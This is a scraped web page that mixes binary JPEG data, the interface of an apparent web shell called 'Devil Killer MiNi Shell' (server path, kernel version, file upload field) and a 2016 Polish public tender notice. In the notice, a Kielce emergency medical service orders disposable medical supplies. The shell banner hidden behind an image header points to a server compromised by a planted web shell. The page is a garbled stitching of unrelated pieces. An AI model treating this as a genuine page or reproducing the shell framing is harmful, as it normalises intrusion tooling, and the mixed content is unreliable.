JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161110/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161110/340620-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.scrmits.pl' target='_blank'>www.scrmits.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 340620 - 2016
              z dnia 2016-11-10 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kielce: Dostawy sprzętu jednorazowego użytku<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Świętokrzyskie Centrum Ratownictwa Medycznego i Transportu Sanitarnego, krajowy numer identyfikacyjny
              29115054400000, ul.
              ul. Św. Leonarda 
              10,
              25311  
              Kielce, woj.
              świętokrzyskie, państwo
              Polska, tel.
              041 3612344 w. 29, e-mail
              , faks
              .
              <br />
              Adres strony internetowej (URL): www.scrmits.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Samodzielny Publiczny Zakład Opieki Zdrowotnej</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.scrmits.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Pisemnie<br />
                Adres:
                <br />25-040 Kielce ul. Pakosz 72, pokój 301</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawy sprzętu jednorazowego użytku<br /><b>Numer referencyjny: </b>TP/267/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia  jest Dostawa sprzętu jednorazowego użytku  w niżej podanych ilościach przez okres jednego roku, o następujących parametrach:
L.p.	Asortyment	Jednostka miary	Ilość sztuk/ opakowań / rolek
1	Cewnik Foley CH16-30, obustronnie pokryty elastomerem silikonowym z plastikową zastawką o pojemności balonu (5-15 ml), jałowy. Na opakowaniu pojedynczym oraz zbiorczym nadrukowana fabrycznie informacja o maksymalnym czasie przebywania cewnika w cewce moczowej pacjenta, sterylizowane radiacyjnie. Op. a 10 sztuk	1 op.	150
2	Cewnik do odsysania górnych dróg oddechowych nr 6-10, o długości 40 cm , sterylny, z dwoma otworami bocznymi i jednym centralnym, pakowany jednostkowo, z  datą ważności i produkcji	1 szt.	130
3	Cewnik do odsysania górnych dróg oddechowych nr 12-20, długość 60 cm	1 szt.	1 000
4	Cewnik do podawania tlenu przez nos z drenem odługości  minmum 180 cm do 220 cm, sterylny.	1 szt.	7 200
5	Czyściwo celulozowe o szerokości 26,5 cm x 141 m, gramatura &lt; 64g/m2 +/- 1 g do 65g/m2 +/- 1 g, z perforacją co 38 cm	1 rolka	40
6	Elektrody piankowe hydrożelowe, owalne o wymiarach 57x34mm	1 szt.	190 000
7	Elektrody piankowe pediatryczne hydrożelowe o wymiarach 30x24 mm	1 szt.	2 000
8	Filtr oddechowy pediatryczny, elektrostatyczny, wirusowo-bakteriobójczy, sterylny z portem do  kapnografii zamykanym zatyczką, waga 9 g, przestrzeń martwa 10 ml	1 szt.	50
9	Filtr oddechowy elektrostatyczny, wirusowo-bakteriobójczy, sterylny z portem do kapnografii zamykanym zatyczką, waga 28,5g, przestrzeń martwa 45ml	1 szt	950
10	Folia izotermiczna (koc ratunkowy) o rozmiarze 1,6x2,4 m	1 szt.	900
11	Igła do injekcji jednorazowego użytku rozm. 5x25; sterylne op=100 szt	1 op.	50
12	Igła do injekcji jednorazowego użytku rozm. 0,6x30; sterylne op=100 szt	1 op.	170
13	Igła do injekcji jednorazowego użytku rozm. 0,7x40; sterylne op=100 szt	1 op.	600
14	Igła do injekcji jednorazowego użytku rozm. 0,8x40; sterylne op=100 szt	1 op.	750
15	Igła do injekcji jednorazowego użytku rozm. 0,9x40; sterylne op=100 szt	1 op.	380
16	Igła do pobierania leków z fiolek z gumowym korkiem z zakończeniem typu Pencil Point, zapobiegającym fragmentacji korka - rozm. 1.2 dł. 30mm - op. a 100 szt.	1 op.	200
17	Jednorazowe końcówki ochronne do termometru Braun a 20 szt.	1 op.	750
18	Kaczka jednorazowego użytku	1 szt.	60
19	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar: 18G 1,2x32mm, przepływ 80ml/min.	1 szt.	16 000
20	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar: 20G 1,0x32mm, przepływ 54ml/min.	1 szt.	30 000
21	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar: 22G 0,8x25mm, przepływ 31ml/min.	1 szt.	12 000
22	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar: 16G 1,7x45mm, przepływ 180ml/min.	1 szt.	500
23	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar: 24G 0,7x19mm, przepływ 18 ml/min.	1 szt.	600
24	Kaniula bezpieczna do długotrwałych wlewów dożylnych wyposażona w automatyczny, plastikowy mechanizm zapobiegający przed zakłuciem podczas użycia i po użyciu kaniuli, aktywowany przez znajdujący się na igle występ, posiadający zastawkę antyzwrotną, bez portu bocznego, ze skrzydełkami oraz dodatkowym uchwytem, 4 paski kontrastujące w RTG, cewnik wykonany z poliuretanu (PUR).Sterylna
Rozmiary:
18G 1,2x32 mm, przepływ 110 ml/min
18G 1,2x45mm, przepływ 100 ml/min	1 szt.	100
25	Kaniula bezpieczna do długotrwałych wlewów dożylnych wyposażona w automatyczny, plastikowy mechanizm zapobiegający przed zakłuciem podczas użycia i po użyciu kaniuli, aktywowany przez znajdujący się na igle występ, posiadający zastawkę antyzwrotną, bez portu bocznego, ze skrzydełkami oraz dodatkowym uchwytem, 4 paski kontrastujące w RTG, cewnik wykonany z poliuretanu (PUR).Sterylna. Rozmiar 20G 1,0x32mm, o przepływie 64 ml/min	1 szt.	100
26	Kieliszki jednorazowego użytku 75 szt. w jednym opakowaniu	1 op.	40
27	Korek do kaniul z trzpieniem poniżej jego krawędzi	1 szt.	100
28	Maska tlenowa z drenem dla dorosłych,	1 szt.	2 000
29	Maska tlenowa z drenem dla dzieci,	1 szt.	550
30	Maska tlenowa z drenem dla dzieci nebulizatorem	1 szt.	250
31	Maska tlenowa z drenem dla dorosłych nebulizatorem	1 szt,	450
32	Nakłuwacz 1,8 mm posiadający barwny  kod głębokości wkłucia a 200 szt.	1 op.	140
33	Nerka jednorazowego użytku	1 szt.	400
34	Opaski uciskowe (stazy) jednorazowego użytku do pobierania krwi w kolorze różowym/niebieskim, wykonane z szerokiego rozciągliwego paska gumy syntetycznej, perforowane, płaskie. Na pojedynczym opakowaniu napisy w języku polskim oraz graficzna instrukcja obsługi. Rolka 25 szt.	1 op.	200
35	Plaster do mocowania kaniul 6 x 8 jałowy transparentny	1 szt.	58 000
36	Papier termoczuły do ekg Zoll 90x90x200,  	1 szt.	2 000
37	Papier do EKG Ascard 112mm x 25m	1 szt.	80
38	Papier do EKG Ascard 58mm x 25m	1 szt.	25
39	Przyrząd do przetaczania płynów infuzyjnych jałowy, w skład aparatu wchodzi: osłonka igły biorczej, igła biorcza dwukanałowa, hydrofobowy filtr powietrza z zatyczką w kolorze niebieskim, komora kroplowa 20 kropli = 1ml+/-0,1ml wolna od PCV, filtr płynu o wielkości oczek 15um, zaciskacz rolkowy, dren medyczny dł. 150cm, łącznik stożkowy luer  lock, osłonka łącznika luer  lock, sterylizowane EO, opakowanie przyrządu blister-pack ( folia-papier). Przyrząd w całości wolny od ftalanów (DEHP) informacja na opakowaniu jednostkowym).	1 szt.	10 000
40	Pęseta jednorazowego użytku mikrobiologicznie czysta	1 szt.	600
41	Rurka ustno - gardłowa Nr 0, sterylna , pakowana jednostkowo, z wyraźną datą produkcji i ważności, oznaczone kolorami	1 szt.	80
42	Rurka ustno - gardłowa Nr 5 sterylna , pakowana jednostkowo, z wyraźną datą produkcji i ważności, oznaczone kolorami	1 szt.	90
43	Rurka ustno - gardłowa Nr 1 sterylna , pakowana jednostkowo, z wyraźną datą produkcji i ważności, oznaczone kolorami	1 szt.	70
44	Rurka ustno - gardłowa Nr 2 sterylna , pakowana jednostkowo, z wyraźną datą produkcji i ważności, oznaczone kolorami	1 szt.	160
45	Rurka ustno - gardłowa Nr 3 sterylna, pakowana jednostkowo, z wyraźną datą produkcji i ważności, oznaczone kolorami	1 szt.	240
46	Rurka ustno - gardłowa Nr 4 sterylna, pakowana jednostkowo, z wyraźną datą produkcji i ważności, oznaczone kolorami	1 szt.	260
47	Rurka intubacyjna bez mankietu( dziecięca) Nr 2; 2,5; 3; 3,5; 4; 4,5;5;5,5;6	1 szt.	140
48	Rurka intubacyjna z mankietem niskociśnieniowym, z podwójnym znacznikiem głębokości  Nr 5  9,5	1 szt.	1 200
49	Szpatułka drewniana sterylna x 100 szt., pakowana jednostkowo, z datą ważności i produkcji	1 op.	450
50	Strzykawka trzyczęściowa 2ml Luer, położenie końcówki centralne, cylinder o wysokim stopniu przejrzystości, z czytelną i nieścieralną, rozszerzoną skalą co 0,1ml do 2,5ml, kontrastujący tłok, gumowa część tłoka z podwójnym uszczelnieniem wyraźna kryza zabezpieczająca przed wysunięciem tłoka, tłok w kolorze zielonym z czterema nacięciami ułatwiającymi jego załamanie po wykonanej procedurze, opakowanie typu blister-pack z polskimi opisami oraz datą produkcji i ważności; pakowane w kartonowe opakowania, op.100szt. Rozmiar kodowany kolorystycznie na opakowaniu.	1 op.	700
51	Strzykawka trzyczęściowa 5ml Luer, położenie końcówki centralne, cylinder o wysokim stopniu przejrzystości, z czytelną i nieścieralną, rozszerzoną skalą co 0,2ml do 5ml i co 0,25ml do 5,5ml, kontrastujący tłok, gumowa część tłoka z podwójnym uszczelnieniem wyraźna kryza zabezpieczająca przed wysunięciem tłoka, tłok w kolorze zielonym z czterema nacięciami ułatwiającymi jego załamanie po wykonanej procedurze, opakowanie typu blister-pack z polskimi opisami oraz datą produkcji i ważności; pakowane w kartonowe opakowania, op.100szt. Rozmiar kodowany kolorystycznie na opakowaniu.	1 op.	500
52	Strzykawka trzyczęściowa 10ml Luer, położenie końcówki centralne, cylinder o wysokim stopniu przejrzystości, z czytelną i nieścieralną, rozszerzoną skalą co 0,2ml do 11ml,  kontrastujący tłok, gumowa część tłoka z podwójnym uszczelnieniem, wyraźna kryza zabezpieczająca przed wysunięciem, tłok w kolorze zielonym z czterema nacięciami ułatwiającymi jego załamanie po wykonanej procedurze, opakowanie typu blister-pack z polskimi opisami oraz datą produkcji ważności; pakowane w kartonowe opakowania op. 100szt. Rozmiar kodowany kolorystycznie na opakowaniu.	1 op.	100
53	Strzykawka trzyczęściowa 20ml Luer, położenie końcówki boczne, cylinder o wysokim stopniu przejrzystości, z czytelną i nieścieralną, rozszerzoną skalą co 0,5ml do 22ml, kontrastujący tłok, gumowa część tłoka z podwójnym uszczelnieniem, wyraźna kryza zabezpieczająca przed wysunięciem tłoka, tłok w kolorze zielonym z czterema nacięciami ułatwiającymi jego złamanie po wykonanej procedurze, opakowanie typu blister-pack z polskimi opisami oraz datą produkcji ważności; pakowane w kartonowe opakowania op. 100 szt. Rozmiar kodowany kolorystycznie na opakowaniu.	1 op.	120
54	Podład celulozowy dwuwarstwowy 50 cm ,długość 50 m z perforacją co 37 cm, gramatura 34g/m nasączony środkiem bakteriobójczym, co ma być potwierdzone deklaracją producenta	1 rolka	100
55	Podład celulozowy dwuwarstwowy 59 cm szerokość, długość 80 m, o gramaturze 34 g/m 
z perforacją co 37 cm, nasączony środkiem bakteriobójczym, co ma być potwierdzone deklaracją producenta	1 rolka	40
56	Pojemniki na odpady medyczne 0,7 l o wysokości 14,3 cm, wykonany z PP, ze wskaźnikiem maksymalnego napełnienia oraz uchwytem do przenoszenia, wyposażony w wieczko z otworem wrzutowym z wcięciem do zdejmowania igieł i otworem typu "margaretka" do zdejmowania igieł insulinowych, z zatrzaskiem zapobiegającym przypadkowemu zamknięciu oraz możliwością zamknięcia tymczasowego oraz stałego, kolor czerwony	1 szt.	4 700
57	Pojemniki na odpady medyczne 5-6 l , o wymiarach: 16,7 cm szerokości i 16,7 cm długości oraz 38,6 cm wysokości, wykonany z PP ,posiadający uchwyt do przenoszenia, posiadający wskaźnk maksymalnego napełnienia, wieczko z otworem wrzutowym z wcięciem do zdejmowania igieł i otworem typu    "margaretka" do zdejmowania igieł insulinowych z systemem zatrzaskowym zapobiegającym przypadkowemu zamknięciu , kolor czerwony	1 szt.	5 000
58	Pojemnik na odpady medyczne 10l wykonany z PP,z pokrywą i otworem o średnicy minimum 90mmm, kolor  czerwony	1 szt.	1 500
59	Przedłużacz tlenowy sterylny długości min. 2,0 m	1 szt.	80
60	Prowadnica do rurek intubacyjnych- rozmiary 6Fr,10Fr,14Fr, sterylne	1 szt.	50
61	Rękawice diagnostyczne  do procedur o podwyższonym ryzyku, lateksowe, bezpudrowe, chlorowane. Grubość pojedynczej ścianki na palcu 0,40 mm, dłoni 0,30 mm, mankiecie 0,20 mm,o długości 290-300 mm, rozciągliwość przed starzeniem 750 %, siła zrywająca przed starzeniem 28 N. Zarejestrowane jako wyrób medyczny oraz środek ochrony osobistej kategorii III. Odporne na przenikanie wirusów zgodnie z normą ASTM F1671 - potwierdzone badaniami z jednostki niezależnej od producenta ,  brakiem potwierdzenia ,bądź potwierdzoną przez wytwórcę/producenta, dołączone do oferty. Odporne na przenikanie mikroorganizmów zgodnie z normą EN 374-2, odporne na przenikanie substancji chemicznych zgodnie z normą EN374-3, odporne na przenikanie cytostatyków zgodnie z normą EN 374-3,zgodnie z normą EN 420, EN 388-potwierdzone certyfikatem z jednostki niezależnej od producenta- dołaczone do oferty. Opakowanie a 50 sztuk. Rozmiar S,M,L,XL.	1 op.	300
62	Rękawice diagnostyczne nitrylowe, bezpudrowe, niejałowe, o wysokiej rozciągliwości, powierzchnia teksturowana na palcach, chlorowane od strony wewnętrznej, pokryte polimerem na stronie roboczej, mankiet ma być rolowany, kształt uniwersalny. Długość minimalna 240 mm, grubość pojedynczej ścianki na palcu 0,08 +/- 0,01; na dłoni 0,07+/- 0,01, a na mankiecie 0,06 +/- 0,01. Rozmiar rękawiczek kodowany kolorystycznie na opakowaniu. Zarejestrowane jako wyrób medyczny oraz środek ochrony indywidualnej kategorii III zgodnie z 89/686/EWG lub niezarejestrowaną. Dopuszczone do kontaktu z żywnością potwierdzone piktogramami na opakowaniu oraz posiadające certyfikat z jednostki niezależnej od producenta, który ma być dołączony do oferty. Zgodne z wymaganiami EN 455 części 1,2,3,4.Odporne na przenikanie wirusów zgodnie z normą  ASTM F1671, potwierdzoną przez jednostkę niezależną brakiem potwierdzenia ,bądź potwierdzoną przez wytwórcę/producenta,   zgodne z normą EN 374-1,2,3 (łącznie z punktem 5.3.2), EN 420, EN 388 - potwierdzone badaniami z jednostki niezależnej od producenta - dołączone do oferty. Odporne na przenikanie min. 10 cytostatyków na min. 2 poziomie- potwierdzone badaniami z jednostki niezależnej od producenta - dołączone do oferty oraz orginalnym nadrukiem substancji i poziomów ochrony na opakowaniu. Informacja o barierowości dla min. 2 alkoholi stosowanych w dezynfekcji o stężeniu min. 70% na min. 2 poziomie ochrony (fabryczne oznakowanie na opakowaniu oraz dołączone do oferty badania z jednostki niezależnej od producenta). Pozbawione tiuramów oraz MBT potwierdzone badaniami HPLC z jednostki niezależnej - dołączone do oferty. Rozmiar S,M,L opakowanie a 200 szt., XL opakowanie a 180 szt.	1 op.	6 000
63	Rękawice chirurgiczne lateksowe sterylne, bezpudrowe, z rolowanym mankietem,polimerowane obustronnie, koloru zielonego.Wewnętrzna warstwa zawiera żel aloesowy, zewnętrzna warstwa antypoślizgowa na całej powierzchni rękawicy. Grubość pojedynczej ścianki na palcu 0,17mm, dłoni 0,16mm, mankiecie 0,15mm, długość 275-300mm, rozciągliwość przed starzeniem min. 870%, siła zrywu przed starzeniem min. 12 N. Na każdej rękawicy nadruk rozmiaru. Produkt zgodny z wymaganiami EN 374, EN 420, EN 388- potwierdzone certyfikatem z jednostki nie zależnej od producenta-dołączony do oferty. Odporna na przenikanie wirusów zgodnie z normą ASTM F 1671. Opakowanie wewnętrzne papierowe, a zewnętrzne folia (nie składane na pół). Rozmiary 5,5-9,0	1 para	1 200
64	Staza gumowa, lateksowa	1 szt.	40
65	Szyna Kramera długość 150 x 10 cm	1 szt.	60
66	Szyna Kramera długość 100x 10cm	1 szt.	80
67	Szyna Kramera długość 80 x 12 cm	1 szt.	40
68	Szyna Kramera  długość 50 x 8 cm	1 szt.	30
69	Układ noworodkowy, 2 rury o długości 1,2 m, średnicy 10mm, końcówki 15 M od strony respiratora, od strony pacjenta złącze Y z portem 7,6 i końcówką 15F	1 szt.	30
70	Układ nnoworodkowy, 2 rury o długości 1,6 m, średnicy 10mm,końcówki 15 M od strony respiratora, od strony pacjenta złącze Y z portem 7,6 i końcówką 15F	1 szt.	50
71	Worek na mocz 2l z odpływem jałowy	1 szt.	1 000
72	Zgłębnik żołądkowy ch 12-24/1250mm	1 szt.	90
73	Żel do EKG 250 ml	1 szt.	55
74	Wziernik plastikowy jednorazowego użytku do otoskopu 4,25 mm op.34 szt.	1 szt.	20
75	Wziernik plastikowy jednorazowego użytku do otoskopu 2,75 mm op.34 szt.	1 szt.	20
76	Bezigłowy port iniekcyjny z przedłużaczem z czasem stosowania przez 7 dni lub do 140 aktywacji, przeźroczysta obudowa, niebieska silikonowa samouszcelniająca się membrana nie wystająca poza obręb portu, bez elementów metalowych, długość całkowita 14cm z przesuwnym zaciskiem na drenie. Dostępne w dwóch średnicach drenów: 1,2 x 2,5mm (przepływ 76 ml/min.) i 3,0 x 4,1mm (przepływ 152ml/min.). Pakowany pojedynczo, sterylny. Opakowanie folia/papier	1 szt.	60
77	Strzykawka do pomp infuzyjnych 50/60 ml trzyczęściowa, Luer-Lock,	1 szt.	100

